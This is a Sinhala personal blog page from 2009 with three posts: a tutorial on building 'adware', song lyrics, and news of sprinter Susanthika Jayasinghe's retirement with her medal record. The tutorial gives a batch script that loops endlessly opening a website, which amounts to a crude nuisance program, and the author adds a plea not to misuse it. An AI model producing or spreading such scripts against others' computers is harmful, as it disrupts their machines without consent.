මුදිතගේ අඩවිය - යෞවනයේ ගවේෂණාත්මක අඩවිය.. අපේ කමින් හැදීවැඩී..
Banner created with MyBannerMaker.com

Friday, February 6, 2009

Adware එකක් හදමු..

මගේ කලින් ලිපියෙන් මම පරිගණකය shutdown කරන වෛරසයක් නිර්මාණය කරන ආකාරය ඉදිරිපත්කලා. ඉතින් මම මේ ලිපියෙන් බලාපොරොත්තු වන්නේ Adware එකක් නිර්මාණය කරන ආකාරය ඉදිරිපත්කරන්නයි.ඊට කලින් Adware කියන්නෙ මොනවද කියල කියන්නම්.

  • ඇත්තටම Adware එකක් කියන්නෙ කූට වෙළද උපක්‍රමයක් කීවොත් මං නිවැරදියි. මක්නිසාදයත් Adware එකක් යොදාගන්නේ තමන්ගේ website එක ප්‍රසිද්ද කරගැනීමේ අරමුණෙන් බැවිනි. Adware එකකින් කරනුයේ අපව දැනුවත්ව හෝ නොදැනුවත්ව අදාල website එකට සම්බන්ද කිරීමයි..
දැන් අපි බලමු Adware එකක් හදන්නෙ කොහොමද කියලා.

සැ::යු::

නමුත් මේවා හදපු පලියටම මෙම වෛරස අයුතු ලෙස ප්‍රයෝජනයට ගන්න එපා කියල මම ඔයාලගෙන් ඉල්ලා සිටිනවා. ඒ වගේම මෙම වෛරස පරීක්ෂා කිරීමේදී ආරක්ෂාවන ලෙසත්, එමගින් ඔබගේ පරිගණකයේ දෝෂ ඇතිවිය හැකි බවත් සලකන්න.

Adware නිර්මාණය ::

1 පියවර :: notepad එක open කරගන්න.

2 පියවර :: එහි පහත දැක්වෙන දෑ type කරන්න.

@echo off

:loop

start www.mywebsite.com

goto loop

www.mywebsite.com වෙනුවටද ඔබට කැමති website එකක් දමන්න.

3 පියවර :: ඉන්පසු මෙය name.bat ලෙස save කරන්න.

( Name වෙනුවටද ඔබට කැමති නමක් type කලහැක. නමුත් .bat අනිවාර්යයි.)

3 පියවර :: දැන් අපේ Adware එක නිර්මාණය කර අවසානයි...


චන්ද්‍රයන් පිදූ ...........



සිහිනෙන් වුවත් නෑ මා දුටුවේ
මාගේ දිවියේ අන්ධකාරේ
ඔබගෙන් පෙර නෑ මා.. කිසිදා හිරැ අග බැලුවේ
නෑ මා කිසිදා හිරැ අග බැලුවේ
පැතුමන් අදුරේ සිරවූයේ
ඔබගේ සෙනෙහෙන් ආදරයේ අර්ථය ලැබුවේ
කදුලැල් දියදහරා නෙතගින් නොකැඩී ගලා ගියේ
මා....... තනිවී
සිසිරෙන් මුවාවූ වසන්තේ උදා වූ ලෙසේ...

චන්ද්‍රයන් පිදූ කිරණක් සගවාලා හොරෙන්
වර්ණවත් කලේ මාගේ සිහිනේ ඔබේ නමින්
වැගුරෑ ඒ කදුලැල් බිදු වියැකී සෙමින්
ඔබ ගෙන ආ සෙනෙහස මුදු පවනේ රැදි සිසිලක් ලෙසින්
සිසිලක් ලෙසින් ඔබ මා හද පුබුදු කලේ...

වසන්තයයි මාගේ දෙතොලේ
සිහිවන්නේ ඔබෙ මුව හමුවේ
කැළඹිලා සැමදා ඔබගේ කැලුමන් අතරේ
අප නෙත් ගැටෙනා මොහොතේ ඔබ මා සතුවයි රහසේ
හැගේ සිතේ නිසංසලේ
රගදෙයි ඔබ දෙසෙනා වග නම් යහනේ තනිවී....

චන්ද්‍රයන් පිදූ කිරණක්..........


ගායනය :: ඩැඩී..
සිංදුව බාගන්න :: http://www.ananmanan.com/emusic/get_lyric.php?lid=1208

සුසන්තිකා ක්‍රීඞා දිවියෙන් සමුගනී..


කෙටි ධාවන ශූරී සුසන්තිකා ජයසිංහ ඊයේ(05 පෙබ 2009) සිය ක්‍රීඞා දිවියෙන් සමුගත්තා. ඇය උතුම් වූ මව් පදවිය ලැබීමට තීරණය කිරීමත් සමග සිය ක්‍රීඞා දිවියට සමුදුන් බව ඇය පවසා සිටියා.

1975 දෙසැම්බර් 17 දින ඇත්තාවල නම් ග්‍රාමයේ උපත ලද ඇය, 1994 සිට මේ දක්වා සිය දක්ෂතාවයෙන් ශ්‍රී ලංකාවට ඉමහත් කීර්තියක් අත්කර දුන්නා.. 2000 වසරේ සිඞ්නි ඔලිම්පික් උළෙලේදී ඇය විසින් ශ්‍රී ලංකාවට හිමිකර දුන් ලෝකඞ පදක්කම, වසර 52 කට පසු ශ්‍රී ලංකාවට හිමිවූ එකම ඔලිම්පික් පදක්කම විය...

1994 සිට විවිධ අයුරින් තම නාමය ඉතිහාස පොතට එකතු කල ඇය ජනාධිපතිතුමා හමුවී සමුගනිද්දී ඔහු ඇයට සමරැ තිළිණයක් සමග මුදලින් මිලියන 50ක ත්‍යාගයක්ද පිරිනැමුවා.

එදා මෙදා තුර සුසන්තිකා ජාත්‍යන්තර තරගබිමේ ලබාගත් ජයග්‍රහන මෙසේය::

  • ආසියානු තරගාවලිය - ජපානය හිරෝෂිමා නගරය - දෙවන ස්ථානය - 200m(1994)
  • අයි.ඒ.ඒ.එෆ් ලෝක ශූරතා තරගාවලිය - ග්‍රීසියේ ඇතැන්ස් නුවර - දෙවන ස්ථානය - 200m(1997)
  • ඔලිම්පික් තරගාවලිය - ඕස්ට්‍රේලියාවේ සිඞ්නි නුවර - දෙවන ස්ථානය - 200m(2000)
  • ගෘහස්ත ලෝක ශූරතා තරගාවලිය - පෘතුගාලය ලිස්බන් - සිව්වන ස්ථානය - 200m(2001)
  • අයි.ඒ.ඒ.එෆ් ලෝක ශූරතා තරගාවලිය - ස්පාඤ්ඤය මැඞ්රිඞ් නුවර - තෙවන ස්ථානය - 100m(2002)
  • ආසියානු තරගාවලිය - ශ්‍රී ලංකාව කොළඹ - ප්‍රථම ස්ථානය - 100m(2002)
  • පොදුරාජ්‍ය තරගාවලිය - බ්‍රිකාන්‍ය මැන්චෙස්ටර් නුවර - සිව්වන ස්ථානය - 100m(2002)
  • අයි.ඒ.ඒ.එෆ් ලෝක ශූරතා තරගාවලිය - ස්පාඤ්ඤය මැඞ්රිඞ් නුවර - සිව්වන ස්ථානය - 200m(2002)
  • ආසියානු තරගාවලිය - ශ්‍රී ලංකාව කොළඹ - ප්‍රථම ස්ථානය - 200m(2002)
  • ආසියානු තරගාවලිය - දෝහා කටාර් - දෙවන ස්ථානය - 100m(2006)
  • ආසියානු තරගාවලිය - දෝහා කටාර් - තෙවන ස්ථානය - 200m(2006)
  • ආසියානු තරගාවලිය - ඡෝර්දාන් අම්මාන් නුවර - ප්‍රථම ස්ථානය - 100m(2007)
  • ආසියානු තරගාවලිය - ඡෝර්දාන් අම්මාන් නුවර - ප්‍රථම ස්ථානය - 200m(2007)
  • අයි.ඒ.ඒ.එෆ් ලෝක ශූරතා තරගාවලිය - ජපානය ඔසාකා නුවර - තෙවන ස්ථානය - 200m(2006)